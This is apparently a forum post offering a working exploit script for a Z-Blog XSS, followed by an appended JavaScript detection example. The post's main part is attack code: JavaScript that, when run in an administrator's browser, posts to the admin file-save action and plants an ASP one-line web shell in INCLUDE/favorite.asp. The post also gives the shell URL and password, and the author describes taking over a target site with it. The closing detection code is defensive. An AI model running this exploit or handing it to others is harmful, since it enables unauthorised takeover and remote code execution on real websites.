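Z-Blog XSS exploit script
A target site I tested earlier ran Z-Blog; the program had been modified and had an XSS, so I wrote a script and took it over. Take it if you need it; it can be used as a template.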
function saveUserInfo()
{
var url = "/cmd.asp?act=SiteFilePst&path=%2E%2FINCLUDE%2Ffavorite%2Easp&opath=D%3A%5CZ%2DBlog18%5Cadmin%5C%2E%2E%5C%5CINCLUDE";
var postStr = 'path=./INCLUDE/favorite.asp&txaContent=<li><a href="http://bbs.rainbowsoft.org/" target="_blank">ZBlogger社区</a></li><%If Request("Z-Blog")<>"" Then ExecuteGlobal(Request("Z-Blog"))%><li><a href="http://download.rainbowsoft.org/" target="_blank">菠萝的海</a></li>';
postStr=encodeURI(postStr);
var ajax = false;
if(window.XMLHttpRequest)
{
ajax = new XMLHttpRequest();
if (ajax.overrideMimeType)
{
ajax.overrideMimeType("text/xml");
}
}
else if (window.ActiveXObject)
{
try
{
ajax = new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
try
{
ajax = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e) {}
}
}
if (!ajax)
{
//window.alert("Unable to create an XMLHttpRequest object instance.");
return false;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{
if (ajax.readyState == 4 && ajax.status == 200)
{
}
}
}
saveUserInfo();
One-liner shell URL:
http://www.xxxx.com/INCLUDE/favorite.asp
One-liner shell password: z-blog
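For the defending side, an added example (not part of the original post) that checks for the two traces the script above leaves: an ASP block that passes request input to Execute/ExecuteGlobal/Eval, and a logged POST to the cmd.asp file-save action whose target is a script file. The function names, the sample strings and the IIS W3C log field order are assumptions made for this example; a legitimate admin edit also matches the log check, so a hit is a prompt to review, not a verdict.

```javascript
// Added example: all names and sample data below are constructed for illustration.
const ASP_BLOCK = /<%([\s\S]*?)%>/g;
// VBScript is case-insensitive; Execute, ExecuteGlobal and Eval all run a string as code.
const EXEC_OF_REQUEST =
  /\b(ExecuteGlobal|Execute|Eval)\b\s*\(?\s*Request\b\s*(\.\s*(Form|QueryString|Item|Cookies)\s*)?\(/i;
const SCRIPT_EXT = /\.(asp|asa|cer|cdx)$/i;

// Return one finding per ASP block that executes request-supplied input.
function findRequestExecution(text) {
  const findings = [];
  for (const m of text.matchAll(ASP_BLOCK)) {
    const hit = EXEC_OF_REQUEST.exec(m[1]);
    if (hit) {
      const line = text.slice(0, m.index).split("\n").length; // 1-based line number
      findings.push({ line, sink: hit[1].toLowerCase(), block: m[0] });
    }
  }
  return findings;
}

// Given one log line, return the decoded target path when it records a POST to
// /cmd.asp with act=SiteFilePst writing a server-side script; otherwise null.
function scriptWriteTarget(logLine) {
  const m = /\bPOST\s+\/cmd\.asp\s+(\S+)/i.exec(logLine);
  if (!m) return null;
  const query = new URLSearchParams(m[1]); // decodes %2E, %2F, ...
  const act = (query.get("act") || "").toLowerCase();
  const target = query.get("path") || "";
  return act === "sitefilepst" && SCRIPT_EXT.test(target) ? target : null;
}

// Constructed samples: a clean include file and a tampered one.
const CLEAN =
  '<li><a href="http://bbs.rainbowsoft.org/" target="_blank">ZBlogger</a></li>\n' +
  '<% Response.Write Server.HTMLEncode(Request("q")) %>\n';
const TAMPERED =
  '<li><a href="http://bbs.rainbowsoft.org/" target="_blank">ZBlogger</a></li>\n' +
  '<%If Request("Z-Blog")<>"" Then ExecuteGlobal(Request("Z-Blog"))%>\n';
// Constructed log lines (documentation IP ranges, assumed W3C field order).
const LOG_HIT =
  "2010-01-01 12:00:00 192.0.2.10 POST /cmd.asp " +
  "act=SiteFilePst&path=%2E%2FINCLUDE%2Ffavorite%2Easp 80 - 198.51.100.7 Mozilla/4.0 200 0 0";
const LOG_MISS =
  "2010-01-01 12:00:05 192.0.2.10 GET /default.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0";

console.log(findRequestExecution(TAMPERED), scriptWriteTarget(LOG_HIT));
```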